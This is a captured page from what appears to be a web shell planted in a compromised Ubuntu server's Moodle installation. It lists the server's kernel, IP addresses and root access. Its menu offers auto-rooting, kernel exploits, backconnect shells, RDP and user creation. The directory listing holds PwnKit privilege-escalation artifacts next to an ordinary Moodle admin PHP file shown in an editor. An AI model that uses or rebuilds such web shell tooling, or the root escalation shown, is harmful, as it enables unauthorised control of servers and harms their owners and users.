Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
admin /
tool /
task /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxrwxr-x
cli
[ DIR ]
drwxrwxr-x
lang
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
clear_fail_delay.php
2.53
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
renderer.php
7.13
KB
-rw-rw-r--
schedule_task.php
3.32
KB
-rw-rw-r--
scheduledtasks.php
3.66
KB
-rw-rw-r--
settings.php
1.06
KB
-rw-rw-r--
styles.css
370
B
-rw-rw-r--
version.php
1.1
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : scheduledtasks.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Scheduled task admin pages. * * @package tool_task * @copyright 2013 Damyon Wiese <damyon@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ require_once(__DIR__ . '/../../../config.php'); require_once($CFG->libdir.'/adminlib.php'); require_once($CFG->libdir.'/tablelib.php'); $PAGE->set_url('/admin/tool/task/scheduledtasks.php'); $PAGE->set_context(context_system::instance()); $PAGE->set_pagelayout('admin'); $strheading = get_string('scheduledtasks', 'tool_task'); $PAGE->set_title($strheading); $PAGE->set_heading($strheading); require_login(); require_capability('moodle/site:config', context_system::instance()); $renderer = $PAGE->get_renderer('tool_task'); $action = optional_param('action', '', PARAM_ALPHAEXT); $taskname = optional_param('task', '', PARAM_RAW); $task = null; $mform = null; if ($taskname) { $task = \core\task\manager::get_scheduled_task($taskname); if (!$task) { print_error('invaliddata'); } } if ($action == 'edit') { $PAGE->navbar->add(get_string('edittaskschedule', 'tool_task', $task->get_name())); } if ($task) { $mform = new tool_task_edit_scheduled_task_form(null, $task); } if ($mform && ($mform->is_cancelled() || !empty($CFG->preventscheduledtaskchanges))) { redirect(new moodle_url('/admin/tool/task/scheduledtasks.php')); } else if ($action == 'edit' && empty($CFG->preventscheduledtaskchanges)) { if ($data = $mform->get_data()) { if ($data->resettodefaults) { $defaulttask = \core\task\manager::get_default_scheduled_task($taskname); $task->set_minute($defaulttask->get_minute()); $task->set_hour($defaulttask->get_hour()); $task->set_month($defaulttask->get_month()); $task->set_day_of_week($defaulttask->get_day_of_week()); $task->set_day($defaulttask->get_day()); $task->set_disabled($defaulttask->get_disabled()); $task->set_customised(false); } else { $task->set_minute($data->minute); $task->set_hour($data->hour); $task->set_month($data->month); $task->set_day_of_week($data->dayofweek); $task->set_day($data->day); $task->set_disabled($data->disabled); $task->set_customised(true); } try { \core\task\manager::configure_scheduled_task($task); redirect($PAGE->url, get_string('changessaved'), null, \core\output\notification::NOTIFY_SUCCESS); } catch (Exception $e) { redirect($PAGE->url, $e->getMessage(), null, \core\output\notification::NOTIFY_ERROR); } } else { echo $OUTPUT->header(); echo $OUTPUT->heading(get_string('edittaskschedule', 'tool_task', $task->get_name())); $mform->display(); echo $OUTPUT->footer(); } } else { echo $OUTPUT->header(); $tasks = core\task\manager::get_all_scheduled_tasks(); echo $renderer->scheduled_tasks_table($tasks); echo $OUTPUT->footer(); }
Close